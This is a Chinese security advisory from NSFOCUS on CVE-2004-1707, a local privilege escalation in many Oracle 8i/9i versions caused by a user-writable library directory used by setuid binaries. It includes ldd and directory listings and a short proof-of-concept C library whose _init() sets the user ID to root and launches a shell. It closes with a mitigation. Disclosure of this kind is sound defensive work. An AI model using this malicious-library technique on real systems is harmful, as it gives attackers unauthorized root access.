首页 -> 安全研究

安全研究

安全漏洞
多个Oralce产品本地权限提升漏洞

发布日期:2004-08-02
更新日期:2004-08-03

受影响系统:
Oracle Oracle8i Standard Edition 9.2 .0.2
Oracle Oracle8i Standard Edition 9.2 .0.1
Oracle Oracle8i Standard Edition 9.0.2
Oracle Oracle8i Standard Edition 9.0.1 .4
Oracle Oracle8i Standard Edition 9.0.1 .3
Oracle Oracle8i Standard Edition 9.0.1 .2
Oracle Oracle8i Standard Edition 9.0.1
Oracle Oracle8i Standard Edition 9.0
Oracle Oracle8i Standard Edition 8.1.7 .4
Oracle Oracle8i Standard Edition 8.1.7 .1
Oracle Oracle8i Standard Edition 8.1.7 .0.0
Oracle Oracle8i Standard Edition 8.1.7
Oracle Oracle8i Standard Edition 8.1.6
Oracle Oracle8i Standard Edition 8.1.5
Oracle Oracle8i Personal Edition 9.2 .0.2
Oracle Oracle8i Personal Edition 9.2 .0.1
Oracle Oracle8i Personal Edition 9.0.1
Oracle Oracle8i Enterprise Edition 9.2 .0.2
Oracle Oracle8i Enterprise Edition 9.2 .0.1
Oracle Oracle8i Enterprise Edition 9.0.1
Oracle Oracle8i Enterprise Edition 8.1.7 .1.0
Oracle Oracle8i Enterprise Edition 8.1.7 .0.0
Oracle Oracle8i Enterprise Edition 8.1.6 .1.0
Oracle Oracle8i Enterprise Edition 8.1.6 .0.0
Oracle Oracle8i Enterprise Edition 8.1.5 .1.0
Oracle Oracle8i Enterprise Edition 8.1.5 .0.2
Oracle Oracle8i Enterprise Edition 8.1.5 .0.0
Oracle Oracle8i Client Edition 9.2 .0.2
Oracle Oracle8i Client Edition 9.2 .0.1
Oracle Oracle8i 9.0.1
Oracle Oracle8i 9.0
Oracle Oracle8i 8.1.7.1
Oracle Oracle8i 8.1.7
Oracle Oracle8i 8.1.6
Oracle Oracle8i 8.1.5
Oracle Oracle8i 8.0.6
Oracle Oracle8i 8.0.5
Oracle Oracle8i 8.0.4
Oracle Oracle8i 8.0.2
Oracle Oracle8i 8.0.1
Oracle Oracle9i Standard Edition 9.2.0.4
Oracle Oracle9i Standard Edition 9.2.0.1
Oracle Oracle9i Release 2 9.2.2
Oracle Oracle9i Release 2 9.2.1
Oracle Oracle9i Personal Edition 9.2.0.4
Oracle Oracle9i Personal Edition 9.2.0.1
Oracle Oracle9i Enterprise Edition 9.2.0.4
Oracle Oracle9i Enterprise Edition 9.2.0.1
Oracle Oracle9i 9.2.0.3
Oracle Oracle9i 9.2.0.2
Oracle Oracle9i 9.2.0.1
Oracle Oracle9i 9.2
Oracle Oracle9i 9.0.2
Oracle Oracle9i 9.0.1.4
Oracle Oracle9i 9.0.1.3
Oracle Oracle9i 9.0.1.2
Oracle Oracle9i 9.0.1
Oracle Oracle9i 9.0
描述:
CVE(CAN) ID: CVE-2004-1707

Oracle是一种强大的企业级数据库系统。

Oracle不正确对lib库目录进行限制,本地攻击者可以利用这个漏洞进行权限提升攻击。

部分setuid属性的应用程序如'/bin/dbsnmp'、'/bin/nmo'以如下方法调用共享库,如:

[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp
        libvppdc.so =>   /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
        libclntsh.so.9.0 =>      /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
        libwtc9.so =>    /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
        libthread.so.1 =>        /usr/lib/libthread.so.1
        libkstat.so.1 =>         /usr/lib/libkstat.so.1
    ....

[iasr2@dimoniet ora9ias_mid]$  ldd ./bin/nmo
        libnsl.so.1 =>   /usr/lib/libnsl.so.1
        libsocket.so.1 =>        /usr/lib/libsocket.so.1
        libgen.so.1 =>   /usr/lib/libgen.so.1
    .....
    
但是lib目录却为iasr2用户可写:

[pask@dimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x   3 iasr2    dba          512 Nov 21 14:04 lbs
drwxr-xr-x  15 iasr2    dba          512 Jan  7 12:13 ldap
drwxr-xr-x   3 iasr2    dba        12800 Nov 21 11:22 lib
drwxr-xr-x  13 iasr2    dba          512 Nov 21 14:04 network
drwxr-xr-x   3 iasr2    dba          512 Nov 21 14:04 ocommon
...

因此iasr2用户可以简单地创建文件,如so.lib:

#include
#include

_init() {
   printf("en el _init()\n");
   printf("Con PID=%i y EUID=%i",getpid(),getuid());
   setuid(0);
   system("/usr/bin/ksh");
   printf("Saliendo del Init()\n");
}

当执行受此漏洞影响的程序时,可导致恶意库被装载而执行任意命令。

<*来源:Juan Manuel Pascual (jmpascual@open3s.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=109147677214087&w=2
*>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 把lib库设置为只有root可写。

厂商补丁:

Oracle
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.oracle.com

浏览次数:2696
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客